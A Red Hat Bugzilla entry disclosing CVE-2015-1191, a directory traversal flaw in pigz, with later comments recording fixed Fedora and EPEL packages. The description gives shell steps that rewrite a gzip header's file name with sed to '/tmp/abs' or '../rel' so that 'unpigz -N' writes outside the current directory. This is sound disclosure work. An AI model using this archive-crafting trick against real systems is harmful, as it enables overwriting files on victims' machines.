Bug 1181045 (CVE-2015-1191)

Summary:	CVE-2015-1191 pigz: directory traversal vulnerability
Product:	[Other] Security Response	Reporter:	Vasyl Kaigorodov <vkaigoro>
Component:	vulnerability	Assignee:	Red Hat Product Security <security-response-team>
Status:	CLOSED UPSTREAM	QA Contact:
Severity:	low	Docs Contact:
Priority:	low
Version:	unspecified	CC:	adel.gadllah, orion
Target Milestone:	---	Keywords:	Security
Target Release:	---
Hardware:	All
OS:	Linux
Whiteboard:
Fixed In Version:		Doc Type:	Bug Fix
Doc Text:		Story Points:	---
Clone Of:		Environment:
Last Closed:	2019-06-08 02:37:43 UTC	Type:	---
Regression:	---	Mount Type:	---
Documentation:	---	CRM:
Verified Versions:		Category:	---
oVirt Team:	---	RHEL 7.3 requirements from Atomic Host:
Cloudforms Team:	---	Target Upstream Version:
Embargoed:
Bug Depends On:	1181046, 1181047
Bug Blocks:

Description Vasyl Kaigorodov 2015-01-12 09:42:04 UTC

It was reported [1] that pigz is susceptible to directory traversal vulnerabilities. While decompressing a file with restoring file name, it (unlike gzip) will happily use absolute and relative paths taken from the input. This can be exploited by a malicious archive to write files outside the current directory.
Steps to reproduce:

1. Absolute path.

A sample could be prepared in following way:

  $ touch XtmpXabs
  $ gzip -c XtmpXabs | sed 's|XtmpXabs|/tmp/abs|g' > abs.gz
  $ rm XtmpXabs

Then check it works:

  $ ls /tmp/abs
  ls: cannot access /tmp/abs: No such file or directory
  $ unpigz -N abs.gz
  $ ls /tmp/abs
  /tmp/abs

2. Relative path with "..".

A sample could be prepared in following way:

  $ rm ../rel
  $ touch XXXrel
  $ gzip -c XXXrel | sed 's|XXXrel|../rel|g' > rel.gz
  $ rm XXXrel

Then check it works:

  $ ls ../rel
  ls: cannot access ../rel: No such file or directory
  $ unpigz -N rel.gz
  $ ls ../rel
  ../rel

No fix is available at this time.

[1]: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=774978

Comment 1 Vasyl Kaigorodov 2015-01-12 09:42:28 UTC

Created pigz tracking bugs for this issue:

Affects: fedora-all [bug 1181046]
Affects: epel-all [bug 1181047]

Comment 2 Fedora Update System 2015-02-14 02:46:24 UTC

pigz-2.3.3-1.el7 has been pushed to the Fedora EPEL 7 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 3 Fedora Update System 2015-02-15 03:18:44 UTC

pigz-2.3.3-1.fc20 has been pushed to the Fedora 20 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 4 Fedora Update System 2015-02-15 03:26:10 UTC

pigz-2.3.3-1.fc21 has been pushed to the Fedora 21 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 5 Fedora Update System 2015-02-15 20:39:44 UTC

pigz-2.3.3-1.el6 has been pushed to the Fedora EPEL 6 stable repository.  If problems still persist, please make note of it in this bug report.

Comment 6 Product Security DevOps Team 2019-06-08 02:37:43 UTC

This CVE Bugzilla entry is for community support informational purposes only as it does not affect a package in a commercially supported Red Hat product. Refer to the dependent bugs for status of those individual community products.